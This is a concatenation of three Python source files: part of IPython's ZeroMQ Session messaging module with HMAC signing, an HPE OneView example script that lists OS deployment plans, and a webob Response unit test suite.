# Mixin tools for apps that use Sessions
#-----------------------------------------------------------------------------
session_aliases = dict(
ident = 'Session.session',
user = 'Session.username',
keyfile = 'Session.keyfile',
)
session_flags = {
'secure' : ({'Session' : { 'key' : str_to_bytes(str(uuid.uuid4())),
'keyfile' : '' }},
"""Use HMAC digests for authentication of messages.
Setting this flag will generate a new UUID to use as the HMAC key.
"""),
'no-secure' : ({'Session' : { 'key' : b'', 'keyfile' : '' }},
"""Don't authenticate messages."""),
}
def default_secure(cfg):
"""Set the default behavior for a config environment to be secure.
If Session.key/keyfile have not been set, set Session.key to
a new random UUID.
"""
if 'Session' in cfg:
if 'key' in cfg.Session or 'keyfile' in cfg.Session:
return
# key/keyfile not specified, generate new UUID:
cfg.Session.key = str_to_bytes(str(uuid.uuid4()))
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class SessionFactory(LoggingConfigurable):
"""The Base class for configurables that have a Session, Context, logger,
and IOLoop.
"""
logname = Unicode('')
def _logname_changed(self, name, old, new):
self.log = logging.getLogger(new)
# not configurable:
context = Instance('zmq.Context')
def _context_default(self):
return zmq.Context.instance()
session = Instance('IPython.zmq.session.Session')
loop = Instance('zmq.eventloop.ioloop.IOLoop', allow_none=False)
def _loop_default(self):
return IOLoop.instance()
def __init__(self, **kwargs):
super(SessionFactory, self).__init__(**kwargs)
if self.session is None:
# construct the session
self.session = Session(**kwargs)
class Message(object):
"""A simple message object that maps dict keys to attributes.
A Message can be created from a dict and a dict from a Message instance
simply by calling dict(msg_obj)."""
def __init__(self, msg_dict):
dct = self.__dict__
for k, v in dict(msg_dict).iteritems():
if isinstance(v, dict):
v = Message(v)
dct[k] = v
# Having this iterator lets dict(msg_obj) work out of the box.
def __iter__(self):
return iter(self.__dict__.iteritems())
def __repr__(self):
return repr(self.__dict__)
def __str__(self):
return pprint.pformat(self.__dict__)
def __contains__(self, k):
return k in self.__dict__
def __getitem__(self, k):
return self.__dict__[k]
def msg_header(msg_id, msg_type, username, session):
date = datetime.now()
return locals()
def extract_header(msg_or_header):
"""Given a message or header, return the header."""
if not msg_or_header:
return {}
try:
# See if msg_or_header is the entire message.
h = msg_or_header['header']
except KeyError:
try:
# See if msg_or_header is just the header
h = msg_or_header['msg_id']
except KeyError:
raise
else:
h = msg_or_header
if not isinstance(h, dict):
h = dict(h)
return h
class Session(Configurable):
"""Object for handling serialization and sending of messages.
The Session object handles building messages and sending them
with ZMQ sockets or ZMQStream objects. Objects can communicate with each
other over the network via Session objects, and only need to work with the
dict-based IPython message spec. The Session will handle
serialization/deserialization, security, and metadata.
Sessions support configurable serialiization via packer/unpacker traits,
and signing with HMAC digests via the key/keyfile traits.
Parameters
----------
debug : bool
whether to trigger extra debugging statements
packer/unpacker : str : 'json', 'pickle' or import_string
importstrings for methods to serialize message parts. If just
'json' or 'pickle', predefined JSON and pickle packers will be used.
Otherwise, the entire importstring must be used.
The functions must accept at least valid JSON input, and output *bytes*.
For example, to use msgpack:
packer = 'msgpack.packb', unpacker='msgpack.unpackb'
pack/unpack : callables
You can also set the pack/unpack callables for serialization directly.
session : bytes
the ID of this Session object. The default is to generate a new UUID.
username : unicode
username added to message headers. The default is to ask the OS.
key : bytes
The key used to initialize an HMAC signature. If unset, messages
will not be signed or checked.
keyfile : filepath
The file containing a key. If this is set, `key` will be initialized
to the contents of the file.
"""
debug=Bool(False, config=True, help="""Debug output in the Session""")
packer = DottedObjectName('json',config=True,
help="""The name of the packer for serializing messages.
Should be one of 'json', 'pickle', or an import name
for a custom callable serializer.""")
def _packer_changed(self, name, old, new):
if new.lower() == 'json':
self.pack = json_packer
self.unpack = json_unpacker
elif new.lower() == 'pickle':
self.pack = pickle_packer
self.unpack = pickle_unpacker
else:
self.pack = import_item(str(new))
unpacker = DottedObjectName('json', config=True,
help="""The name of the unpacker for unserializing messages.
Only used with custom functions for `packer`.""")
def _unpacker_changed(self, name, old, new):
if new.lower() == 'json':
self.pack = json_packer
self.unpack = json_unpacker
elif new.lower() == 'pickle':
self.pack = pickle_packer
self.unpack = pickle_unpacker
else:
self.unpack = import_item(str(new))
session = CUnicode(u'', config=True,
help="""The UUID identifying this session.""")
def _session_default(self):
u = unicode(uuid.uuid4())
self.bsession = u.encode('ascii')
return u
def _session_changed(self, name, old, new):
self.bsession = self.session.encode('ascii')
# bsession is the session as bytes
bsession = CBytes(b'')
username = Unicode(os.environ.get('USER',u'username'), config=True,
help="""Username for the Session. Default is your system username.""")
# message signature related traits:
key = CBytes(b'', config=True,
help="""execution key, for extra authentication.""")
def _key_changed(self, name, old, new):
if new:
self.auth = hmac.HMAC(new)
else:
self.auth = None
auth = Instance(hmac.HMAC)
digest_history = Set()
keyfile = Unicode('', config=True,
help="""path to file containing execution key.""")
def _keyfile_changed(self, name, old, new):
with open(new, 'rb') as f:
self.key = f.read().strip()
# serialization traits:
pack = Any(default_packer) # the actual packer function
def _pack_changed(self, name, old, new):
if not callable(new):
raise TypeError("packer must be callable, not %s"%type(new))
unpack = Any(default_unpacker) # the actual packer function
def _unpack_changed(self, name, old, new):
# unpacker is not checked - it is assumed to be
if not callable(new):
raise TypeError("unpacker must be callable, not %s"%type(new))
def __init__(self, **kwargs):
"""create a Session object
Parameters
----------
debug : bool
whether to trigger extra debugging statements
packer/unpacker : str : 'json', 'pickle' or import_string
importstrings for methods to serialize message parts. If just
'json' or 'pickle', predefined JSON and pickle packers will be used.
Otherwise, the entire importstring must be used.
The functions must accept at least valid JSON input, and output
*bytes*.
For example, to use msgpack:
packer = 'msgpack.packb', unpacker='msgpack.unpackb'
pack/unpack : callables
You can also set the pack/unpack callables for serialization
directly.
session : unicode (must be ascii)
the ID of this Session object. The default is to generate a new
UUID.
bsession : bytes
The session as bytes
username : unicode
username added to message headers. The default is to ask the OS.
key : bytes
The key used to initialize an HMAC signature. If unset, messages
will not be signed or checked.
keyfile : filepath
The file containing a key. If this is set, `key` will be
initialized to the contents of the file.
"""
super(Session, self).__init__(**kwargs)
self._check_packers()
self.none = self.pack({})
# ensure self._session_default() if necessary, so bsession is defined:
self.session
@property
def msg_id(self):
"""always return new uuid"""
return str(uuid.uuid4())
def _check_packers(self):
"""check packers for binary data and datetime support."""
pack = self.pack
unpack = self.unpack
# check simple serialization
msg = dict(a=[1,'hi'])
try:
packed = pack(msg)
except Exception:
raise ValueError("packer could not serialize a simple message")
# ensure packed message is bytes
if not isinstance(packed, bytes):
raise ValueError("message packed to %r, but bytes are required"%type(packed))
# check that unpack is pack's inverse
try:
unpacked = unpack(packed)
except Exception:
raise ValueError("unpacker could not handle the packer's output")
# check datetime support
msg = dict(t=datetime.now())
try:
unpacked = unpack(pack(msg))
except Exception:
self.pack = lambda o: pack(squash_dates(o))
self.unpack = lambda s: extract_dates(unpack(s))
def msg_header(self, msg_type):
return msg_header(self.msg_id, msg_type, self.username, self.session)
def msg(self, msg_type, content=None, parent=None, subheader=None, header=None):
"""Return the nested message dict.
This format is different from what is sent over the wire. The
serialize/unserialize methods converts this nested message dict to the wire
format, which is a list of message parts.
"""
msg = {}
header = self.msg_header(msg_type) if header is None else header
msg['header'] = header
msg['msg_id'] = header['msg_id']
msg['msg_type'] = header['msg_type']
msg['parent_header'] = {} if parent is None else extract_header(parent)
msg['content'] = {} if content is None else content
sub = {} if subheader is None else subheader
msg['header'].update(sub)
return msg
def sign(self, msg_list):
"""Sign a message with HMAC digest. If no auth, return b''.
Parameters
----------
msg_list : list
The [p_header,p_parent,p_content] part of the message list.
"""
if self.auth is None:
return b''
h = self.auth.copy()
for m in msg_list:
h.update(m)
return str_to_bytes(h.hexdigest())
def serialize(self, msg, ident=None):
"""Serialize the message components to bytes.
This is roughly the inverse of unserialize. The serialize/unserialize
methods work with full message lists, whereas pack/unpack work with
the individual message parts in the message list.
Parameters
----------
msg : dict or Message
The nexted message dict as returned by the self.msg method.
Returns
-------
msg_list : list
The list of bytes objects to be sent with the format:
[ident1,ident2,...,DELIM,HMAC,p_header,p_parent,p_content,
buffer1,buffer2,...]. In this list, the p_* entities are
the packed or serialized versions, so if JSON is used, these
are utf8 encoded JSON strings.
"""
content = msg.get('content', {})
if content is None:
content = self.none
elif isinstance(content, dict):
content = self.pack(content)
elif isinstance(content, bytes):
# content is already packed, as in a relayed message
pass
elif isinstance(content, unicode):
# should be bytes, but JSON often spits out unicode
content = content.encode('utf8')
else:
raise TypeError("Content incorrect type: %s"%type(content))
real_message = [self.pack(msg['header']),
self.pack(msg['parent_header']),
content
]
to_send = []
if isinstance(ident, list):
# accept list of idents
to_send.extend(ident)
elif ident is not None:
to_send.append(ident)
to_send.append(DELIM)
signature = self.sign(real_message)
to_send.append(signature)
to_send.extend(real_message)
return to_send
def send(self, stream, msg_or_type, content=None, parent=None, ident=None,
buffers=None, subheader=None, track=False, header=None):
"""Build and send a message via stream or socket.
The message format used by this function internally is as follows:
[ident1,ident2,...,DELIM,HMAC,p_header,p_parent,p_content,
buffer1,buffer2,...]
The serialize/unserialize methods convert the nested message dict into this
format.
Parameters
----------
stream : zmq.Socket or ZMQStream
The socket-like object used to send the data.
msg_or_type : str or Message/dict
Normally, msg_or_type will be a msg_type unless a message is being
sent more than once. If a header is supplied, this can be set to
None and the msg_type will be pulled from the header.
content : dict or None
The content of the message (ignored if msg_or_type is a message).
header : dict or None
The header dict for the message (ignores if msg_to_type is a message).
parent : Message or dict or None
The parent or parent header describing the parent of this message
(ignored if msg_or_type is a message).
ident : bytes or list of bytes
The zmq.IDENTITY routing path.
subheader : dict or None
Extra header keys for this message's header (ignored if msg_or_type
is a message).
buffers : list or None
The already-serialized buffers to be appended to the message.
track : bool
Whether to track. Only for use with Sockets, because ZMQStream
objects cannot track messages.
Returns
-------
msg : dict
The constructed message.
(msg,tracker) : (dict, MessageTracker)
if track=True, then a 2-tuple will be returned,
the first element being the constructed
message, and the second being the MessageTracker
"""
if not isinstance(stream, (zmq.Socket, ZMQStream)):
raise TypeError("stream must be Socket or ZMQStream, not %r"%type(stream))
elif track and isinstance(stream, ZMQStream):
raise TypeError("ZMQStream cannot track messages")
if isinstance(msg_or_type, (Message, dict)):
# We got a Message or message dict, not a msg_type so don't
# build a new Message.
msg = msg_or_type
else:
msg = self.msg(msg_or_type, content=content, parent=parent,
subheader=subheader, header=header)
buffers = [] if buffers is None else buffers
to_send = self.serialize(msg, ident)
flag = 0
if buffers:
flag = zmq.SNDMORE
_track = False
else:
_track=track
if track:
tracker = stream.send_multipart(to_send, flag, copy=False, track=_track)
else:
tracker = stream.send_multipart(to_send, flag, copy=False)
for b in buffers[:-1]:
stream.send(b, flag, copy=False)
if buffers:
if track:
tracker = stream.send(buffers[-1], copy=False, track=track)
else:
tracker = stream.send(buffers[-1], copy=False)
# omsg = Message(msg)
if self.debug:
pprint.pprint(msg)
pprint.pprint(to_send)
pprint.pprint(buffers)
msg['tracker'] = tracker
return msg
def send_raw(self, stream, msg_list, flags=0, copy=True, ident=None):
"""Send a raw message via ident path.
This method is used to send a already serialized message.
Parameters
----------
stream : ZMQStream or Socket
The ZMQ stream or socket to use for sending the message.
msg_list : list
The serialized list of messages to send. This only includes the
[p_header,p_parent,p_content,buffer1,buffer2,...] portion of
the message.
ident : ident or list
A single ident or a list of idents to use in sending.
"""
to_send = []
if isinstance(ident, bytes):
ident = [ident]
if ident is not None:
to_send.extend(ident)
to_send.append(DELIM)
to_send.append(self.sign(msg_list))
to_send.extend(msg_list)
stream.send_multipart(msg_list, flags, copy=copy)
def recv(self, socket, mode=zmq.NOBLOCK, content=True, copy=True):
"""Receive and unpack a message.
Parameters
----------
socket : ZMQStream or Socket
The socket or stream to use in receiving.
Returns
-------
[idents], msg
[idents] is a list of idents and msg is a nested message dict of
same format as self.msg returns.
"""
if isinstance(socket, ZMQStream):
socket = socket.socket
try:
msg_list = socket.recv_multipart(mode, copy=copy)
except zmq.ZMQError as e:
if e.errno == zmq.EAGAIN:
# We can convert EAGAIN to None as we know in this case
# recv_multipart won't return None.
return None,None
else:
raise
# split multipart message into identity list and message dict
# invalid large messages can cause very expensive string comparisons
idents, msg_list = self.feed_identities(msg_list, copy)
try:
return idents, self.unserialize(msg_list, content=content, copy=copy)
except Exception as e:
# TODO: handle it
raise e
def feed_identities(self, msg_list, copy=True):
"""Split the identities from the rest of the message.
Feed until DELIM is reached, then return the prefix as idents and
remainder as msg_list. This is easily broken by setting an IDENT to DELIM,
but that would be silly.
Parameters
----------
msg_list : a list of Message or bytes objects
The message to be split.
copy : bool
flag determining whether the arguments are bytes or Messages
Returns
-------
(idents, msg_list) : two lists
idents will always be a list of bytes, each of which is a ZMQ
identity. msg_list will be a list of bytes or zmq.Messages of the
form [HMAC,p_header,p_parent,p_content,buffer1,buffer2,...] and
should be unpackable/unserializable via self.unserialize at this
point.
"""
if copy:
idx = msg_list.index(DELIM)
return msg_list[:idx], msg_list[idx+1:]
else:
failed = True
for idx,m in enumerate(msg_list):
if m.bytes == DELIM:
failed = False
break
if failed:
raise ValueError("DELIM not in msg_list")
idents, msg_list = msg_list[:idx], msg_list[idx+1:]
return [m.bytes for m in idents], msg_list
def unserialize(self, msg_list, content=True, copy=True):
"""Unserialize a msg_list to a nested message dict.
This is roughly the inverse of serialize. The serialize/unserialize
methods work with full message lists, whereas pack/unpack work with
the individual message parts in the message list.
Parameters:
-----------
msg_list : list of bytes or Message objects
The list of message parts of the form [HMAC,p_header,p_parent,
p_content,buffer1,buffer2,...].
content : bool (True)
Whether to unpack the content dict (True), or leave it packed
(False).
copy : bool (True)
Whether to return the bytes (True), or the non-copying Message
object in each place (False).
Returns
-------
msg : dict
The nested message dict with top-level keys [header, parent_header,
content, buffers].
"""
minlen = 4
message = {}
if not copy:
for i in range(minlen):
msg_list[i] = msg_list[i].bytes
if self.auth is not None:
signature = msg_list[0]
if not signature:
raise ValueError("Unsigned Message")
if signature in self.digest_history:
raise ValueError("Duplicate Signature: %r"%signature)
self.digest_history.add(signature)
check = self.sign(msg_list[1:4])
if not signature == check:
raise ValueError("Invalid Signature: %r"%signature)
if not len(msg_list) >= minlen:
raise TypeError("malformed message, must have at least %i elements"%minlen)
header = self.unpack(msg_list[1])
message['header'] = header
message['msg_id'] = header['msg_id']
message['msg_type'] = header['msg_type']
message['parent_header'] = self.unpack(msg_list[2])
if content:
message['content'] = self.unpack(msg_list[3])
else:
message['content'] = msg_list[3]
message['buffers'] = msg_list[4:]
return message
def test_msg2obj():
am = dict(x=1)
ao = Message(am)
assert ao.x == am['x']
am['y'] = dict(z=1)
ao = Message(am)
assert ao.y.z == am['y']['z']
k1, k2 = 'y', 'z'
assert ao[k1][k2] == am[k1][k2]
am2 = dict(ao)
assert am['x'] == am2['x']
assert am['y']['z'] == am2['y']['z']
|
the-stack_106_23355 | # -*- coding: utf-8 -*-
###
# (C) Copyright (2012-2019) Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
###
from pprint import pprint
from config_loader import try_load_from_file
from hpOneView.oneview_client import OneViewClient
config = {
"ip": "<oneview_ip>",
"credentials": {
"userName": "<user>",
"password": "<password>"
}
}
# Try load config from a file (if there is a config file)
config = try_load_from_file(config)
oneview_client = OneViewClient(config)
os_deployment_plans = oneview_client.os_deployment_plans
print("\nGet OS Deployment Plans by Filter:")
plans = os_deployment_plans.get_by('deploymentType', 'I3S')
pprint(plans)
print("\nGet the OS Deployment Plan by Name:")
os_deployment_plan = os_deployment_plans.get_by('name', 'Deployment Plan')
pprint(os_deployment_plan)
print("\nGet all OS Deployment Plans:")
os_deployment_plans_all = os_deployment_plans.get_all()
pprint(os_deployment_plans_all)
|
the-stack_106_23356 | import sys
import zlib
if sys.version >= '2.7':
from io import BytesIO as StringIO
else:
from cStringIO import StringIO
try:
from hashlib import md5
except ImportError:
from md5 import md5
from nose.tools import eq_, ok_, assert_raises
from webob import BaseRequest, Request, Response
def simple_app(environ, start_response):
start_response('200 OK', [
('Content-Type', 'text/html; charset=utf8'),
])
return ['OK']
def test_response():
req = BaseRequest.blank('/')
res = req.get_response(simple_app)
assert res.status == '200 OK'
assert res.status_int == 200
assert res.body == "OK"
assert res.charset == 'utf8'
assert res.content_type == 'text/html'
res.status = 404
assert res.status == '404 Not Found'
assert res.status_int == 404
res.body = 'Not OK'
assert ''.join(res.app_iter) == 'Not OK'
res.charset = 'iso8859-1'
assert res.headers['content-type'] == 'text/html; charset=iso8859-1'
res.content_type = 'text/xml'
assert res.headers['content-type'] == 'text/xml; charset=iso8859-1'
res.headers = {'content-type': 'text/html'}
assert res.headers['content-type'] == 'text/html'
assert res.headerlist == [('content-type', 'text/html')]
res.set_cookie('x', 'y')
assert res.headers['set-cookie'].strip(';') == 'x=y; Path=/'
res = Response('a body', '200 OK', content_type='text/html')
res.encode_content()
assert res.content_encoding == 'gzip'
eq_(res.body, '\x1f\x8b\x08\x00\x00\x00\x00\x00\x02\xffKTH\xcaO\xa9\x04\x00\xf6\x86GI\x06\x00\x00\x00')
res.decode_content()
assert res.content_encoding is None
assert res.body == 'a body'
res.set_cookie('x', u'foo') # test unicode value
assert_raises(TypeError, Response, app_iter=iter(['a']),
body="somebody")
del req.environ
eq_(Response(request=req)._environ, req)
eq_(Response(request=req)._request, None)
assert_raises(TypeError, Response, charset=None,
body=u"unicode body")
assert_raises(TypeError, Response, wrong_key='dummy')
def test_content_type():
r = Response()
# default ctype and charset
eq_(r.content_type, 'text/html')
eq_(r.charset, 'UTF-8')
# setting to none, removes the header
r.content_type = None
eq_(r.content_type, None)
eq_(r.charset, None)
# can set missing ctype
r.content_type = None
eq_(r.content_type, None)
def test_cookies():
res = Response()
res.set_cookie('x', u'\N{BLACK SQUARE}') # test unicode value
eq_(res.headers.getall('set-cookie'), ['x="\\342\\226\\240"; Path=/']) # uft8 encoded
r2 = res.merge_cookies(simple_app)
r2 = BaseRequest.blank('/').get_response(r2)
eq_(r2.headerlist,
[('Content-Type', 'text/html; charset=utf8'),
('Set-Cookie', 'x="\\342\\226\\240"; Path=/'),
]
)
def test_http_only_cookie():
req = Request.blank('/')
res = req.get_response(Response('blah'))
res.set_cookie("foo", "foo", httponly=True)
eq_(res.headers['set-cookie'], 'foo=foo; Path=/; HttpOnly')
def test_headers():
r = Response()
tval = 'application/x-test'
r.headers.update({'content-type': tval})
eq_(r.headers.getall('content-type'), [tval])
def test_response_copy():
r = Response(app_iter=iter(['a']))
r2 = r.copy()
eq_(r.body, 'a')
eq_(r2.body, 'a')
def test_response_copy_content_md5():
res = Response()
res.md5_etag(set_content_md5=True)
assert res.content_md5
res2 = res.copy()
assert res.content_md5
assert res2.content_md5
eq_(res.content_md5, res2.content_md5)
def test_HEAD_closes():
req = Request.blank('/')
req.method = 'HEAD'
app_iter = StringIO('foo')
res = req.get_response(Response(app_iter=app_iter))
eq_(res.status_int, 200)
eq_(res.body, '')
ok_(app_iter.closed)
def test_HEAD_conditional_response_returns_empty_response():
from webob.response import EmptyResponse
req = Request.blank('/')
req.method = 'HEAD'
res = Response(request=req, conditional_response=True)
class FakeRequest:
method = 'HEAD'
if_none_match = 'none'
if_modified_since = False
range = False
def __init__(self, env):
self.env = env
def start_response(status, headerlist):
pass
res.RequestClass = FakeRequest
result = res({}, start_response)
ok_(isinstance(result, EmptyResponse))
def test_HEAD_conditional_response_range_empty_response():
from webob.response import EmptyResponse
req = Request.blank('/')
req.method = 'HEAD'
res = Response(request=req, conditional_response=True)
res.status_int = 200
res.body = 'Are we not men?'
res.content_length = len(res.body)
class FakeRequest:
method = 'HEAD'
if_none_match = 'none'
if_modified_since = False
def __init__(self, env):
self.env = env
self.range = self # simulate inner api
self.if_range = self
def content_range(self, length):
"""range attr"""
class Range:
start = 4
stop = 5
return Range
def match_response(self, res):
"""if_range_match attr"""
return True
def start_response(status, headerlist):
pass
res.RequestClass = FakeRequest
result = res({}, start_response)
ok_(isinstance(result, EmptyResponse), result)
def test_conditional_response_if_none_match_false():
req = Request.blank('/', if_none_match='foo')
resp = Response(app_iter=['foo\n'],
conditional_response=True, etag='foo')
resp = req.get_response(resp)
eq_(resp.status_int, 304)
def test_conditional_response_if_none_match_true():
req = Request.blank('/', if_none_match='foo')
resp = Response(app_iter=['foo\n'],
conditional_response=True, etag='bar')
resp = req.get_response(resp)
eq_(resp.status_int, 200)
def test_conditional_response_if_modified_since_false():
from datetime import datetime, timedelta
req = Request.blank('/', if_modified_since=datetime(2011, 3, 17, 13, 0, 0))
resp = Response(app_iter=['foo\n'], conditional_response=True,
last_modified=req.if_modified_since-timedelta(seconds=1))
resp = req.get_response(resp)
eq_(resp.status_int, 304)
def test_conditional_response_if_modified_since_true():
from datetime import datetime, timedelta
req = Request.blank('/', if_modified_since=datetime(2011, 3, 17, 13, 0, 0))
resp = Response(app_iter=['foo\n'], conditional_response=True,
last_modified=req.if_modified_since+timedelta(seconds=1))
resp = req.get_response(resp)
eq_(resp.status_int, 200)
def test_conditional_response_range_not_satisfiable_response():
req = Request.blank('/', range='bytes=100-200')
resp = Response(app_iter=['foo\n'], content_length=4,
conditional_response=True)
resp = req.get_response(resp)
eq_(resp.status_int, 416)
eq_(resp.content_range.start, None)
eq_(resp.content_range.stop, None)
eq_(resp.content_range.length, 4)
eq_(resp.body, 'Requested range not satisfiable: bytes=100-200')
def test_HEAD_conditional_response_range_not_satisfiable_response():
req = Request.blank('/', method='HEAD', range='bytes=100-200')
resp = Response(app_iter=['foo\n'], content_length=4,
conditional_response=True)
resp = req.get_response(resp)
eq_(resp.status_int, 416)
eq_(resp.content_range.start, None)
eq_(resp.content_range.stop, None)
eq_(resp.content_range.length, 4)
eq_(resp.body, '')
def test_del_environ():
res = Response()
res.environ = {'yo': 'mama'}
eq_(res.environ, {'yo': 'mama'})
del res.environ
eq_(res.environ, None)
eq_(res.request, None)
def test_set_request_environ():
res = Response()
class FakeRequest:
environ = {'jo': 'mama'}
res.request = FakeRequest
eq_(res.environ, {'jo': 'mama'})
eq_(res.request, FakeRequest)
res.environ = None
eq_(res.environ, None)
eq_(res.request, None)
def test_del_request():
res = Response()
class FakeRequest:
environ = {}
res.request = FakeRequest
del res.request
eq_(res.environ, None)
eq_(res.request, None)
def test_set_environ_via_request_subterfuge():
class FakeRequest:
def __init__(self, env):
self.environ = env
res = Response()
res.RequestClass = FakeRequest
res.request = {'action': 'dwim'}
eq_(res.environ, {'action': 'dwim'})
ok_(isinstance(res.request, FakeRequest))
eq_(res.request.environ, res.environ)
def test_set_request():
res = Response()
class FakeRequest:
environ = {'foo': 'bar'}
res.request = FakeRequest
eq_(res.request, FakeRequest)
eq_(res.environ, FakeRequest.environ)
res.request = None
eq_(res.environ, None)
eq_(res.request, None)
def test_md5_etag():
res = Response()
res.body = """\
In A.D. 2101
War was beginning.
Captain: What happen ?
Mechanic: Somebody set up us the bomb.
Operator: We get signal.
Captain: What !
Operator: Main screen turn on.
Captain: It's You !!
Cats: How are you gentlemen !!
Cats: All your base are belong to us.
Cats: You are on the way to destruction.
Captain: What you say !!
Cats: You have no chance to survive make your time.
Cats: HA HA HA HA ....
Captain: Take off every 'zig' !!
Captain: You know what you doing.
Captain: Move 'zig'.
Captain: For great justice."""
res.md5_etag()
ok_(res.etag)
ok_('\n' not in res.etag)
eq_(res.etag,
md5(res.body).digest().encode('base64').replace('\n', '').strip('='))
eq_(res.content_md5, None)
def test_md5_etag_set_content_md5():
res = Response()
b = 'The quick brown fox jumps over the lazy dog'
res.md5_etag(b, set_content_md5=True)
ok_(res.content_md5,
md5(b).digest().encode('base64').replace('\n', '').strip('='))
def test_decode_content_defaults_to_identity():
res = Response()
res.body = 'There be dragons'
res.decode_content()
eq_(res.body, 'There be dragons')
def test_decode_content_with_deflate():
res = Response()
b = 'Hey Hey Hey'
# Simulate inflate by chopping the headers off
# the gzip encoded data
res.body = zlib.compress(b)[2:-4]
res.content_encoding = 'deflate'
res.decode_content()
eq_(res.body, b)
eq_(res.content_encoding, None)
def test_content_length():
r0 = Response('x'*10, content_length=10)
req_head = Request.blank('/', method='HEAD')
r1 = req_head.get_response(r0)
eq_(r1.status_int, 200)
eq_(r1.body, '')
eq_(r1.content_length, 10)
req_get = Request.blank('/')
r2 = req_get.get_response(r0)
eq_(r2.status_int, 200)
eq_(r2.body, 'x'*10)
eq_(r2.content_length, 10)
r3 = Response(app_iter=['x']*10)
eq_(r3.content_length, None)
eq_(r3.body, 'x'*10)
eq_(r3.content_length, 10)
r4 = Response(app_iter=['x']*10, content_length=20) # wrong content_length
eq_(r4.content_length, 20)
assert_raises(AssertionError, lambda: r4.body)
req_range = Request.blank('/', range=(0,5))
r0.conditional_response = True
r5 = req_range.get_response(r0)
eq_(r5.status_int, 206)
eq_(r5.body, 'xxxxx')
eq_(r5.content_length, 5)
def test_app_iter_range():
req = Request.blank('/', range=(2,5))
for app_iter in [
['012345'],
['0', '12345'],
['0', '1234', '5'],
['01', '2345'],
['01', '234', '5'],
['012', '34', '5'],
['012', '3', '4', '5'],
['012', '3', '45'],
['0', '12', '34', '5'],
['0', '12', '345'],
]:
r = Response(
app_iter=app_iter,
content_length=6,
conditional_response=True,
)
res = req.get_response(r)
eq_(list(res.content_range), [2,5,6])
eq_(res.body, '234', 'body=%r; app_iter=%r' % (res.body, app_iter))
def test_app_iter_range_inner_method():
class FakeAppIter:
def app_iter_range(self, start, stop):
return 'you win', start, stop
res = Response(app_iter=FakeAppIter())
eq_(res.app_iter_range(30, 40), ('you win', 30, 40))
def test_content_type_in_headerlist():
# Couldn't manage to clone Response in order to modify class
# attributes safely. Shouldn't classes be fresh imported for every
# test?
default_content_type = Response.default_content_type
Response.default_content_type = None
try:
res = Response(headerlist=[('Content-Type', 'text/html')],
charset='utf8')
ok_(res._headerlist)
eq_(res.charset, 'utf8')
finally:
Response.default_content_type = default_content_type
def test_from_file():
res = Response('test')
equal_resp(res)
res = Response(app_iter=iter(['test ', 'body']),
content_type='text/plain')
equal_resp(res)
def equal_resp(res):
input_ = StringIO(str(res))
res2 = Response.from_file(input_)
eq_(res.body, res2.body)
eq_(res.headers, res2.headers)
def test_from_file_w_leading_space_in_header():
# Make sure the removal of code dealing with leading spaces is safe
res1 = Response()
file_w_space = StringIO('200 OK\n\tContent-Type: text/html; charset=UTF-8')
res2 = Response.from_file(file_w_space)
eq_(res1.headers, res2.headers)
def test_file_bad_header():
file_w_bh = StringIO('200 OK\nBad Header')
assert_raises(ValueError, Response.from_file, file_w_bh)
def test_set_status():
res = Response()
res.status = u"OK 200"
eq_(res.status, "OK 200")
assert_raises(TypeError, setattr, res, 'status', float(200))
def test_set_headerlist():
res = Response()
# looks like a list
res.headerlist = (('Content-Type', 'text/html; charset=UTF-8'),)
eq_(res.headerlist, [('Content-Type', 'text/html; charset=UTF-8')])
# has items
res.headerlist = {'Content-Type': 'text/html; charset=UTF-8'}
eq_(res.headerlist, [('Content-Type', 'text/html; charset=UTF-8')])
del res.headerlist
eq_(res.headerlist, [])
def test_request_uri_no_script_name():
from webob.response import _request_uri
environ = {
'wsgi.url_scheme': 'http',
'HTTP_HOST': 'test.com',
'SCRIPT_NAME': '/foobar',
}
eq_(_request_uri(environ), 'http://test.com/foobar')
def test_request_uri_https():
from webob.response import _request_uri
environ = {
'wsgi.url_scheme': 'https',
'SERVER_NAME': 'test.com',
'SERVER_PORT': '443',
'SCRIPT_NAME': '/foobar',
}
eq_(_request_uri(environ), 'https://test.com/foobar')
def test_app_iter_range_starts_after_iter_end():
from webob.response import AppIterRange
range = AppIterRange(iter([]), start=1, stop=1)
eq_(list(range), [])
def test_resp_write_app_iter_non_list():
res = Response(app_iter=('a','b'))
eq_(res.content_length, None)
res.write('c')
eq_(res.body, 'abc')
eq_(res.content_length, 3)
def test_response_file_body_writelines():
from webob.response import ResponseBodyFile
res = Response(app_iter=['foo'])
rbo = ResponseBodyFile(res)
rbo.writelines(['bar', 'baz'])
eq_(res.app_iter, ['foo', 'bar', 'baz'])
rbo.flush() # noop
eq_(res.app_iter, ['foo', 'bar', 'baz'])
def test_response_write_non_str():
res = Response()
assert_raises(TypeError, res.write, object())
def test_response_file_body_write_empty_app_iter():
from webob.response import ResponseBodyFile
res = Response('foo')
res.write('baz')
eq_(res.app_iter, ['foo', 'baz'])
def test_response_file_body_write_empty_body():
res = Response('')
res.write('baz')
eq_(res.app_iter, ['', 'baz'])
def test_response_file_body_close_not_implemented():
rbo = Response().body_file
assert_raises(NotImplementedError, rbo.close)
def test_response_file_body_repr():
rbo = Response().body_file
rbo.response = 'yo'
eq_(repr(rbo), "<body_file for 'yo'>")
def test_body_get_is_none():
res = Response()
res._app_iter = None
assert_raises(TypeError, Response, app_iter=iter(['a']),
body="somebody")
assert_raises(AttributeError, res.__getattribute__, 'body')
def test_body_get_is_unicode_notverylong():
res = Response(app_iter=(u'foo',))
assert_raises(TypeError, res.__getattribute__, 'body')
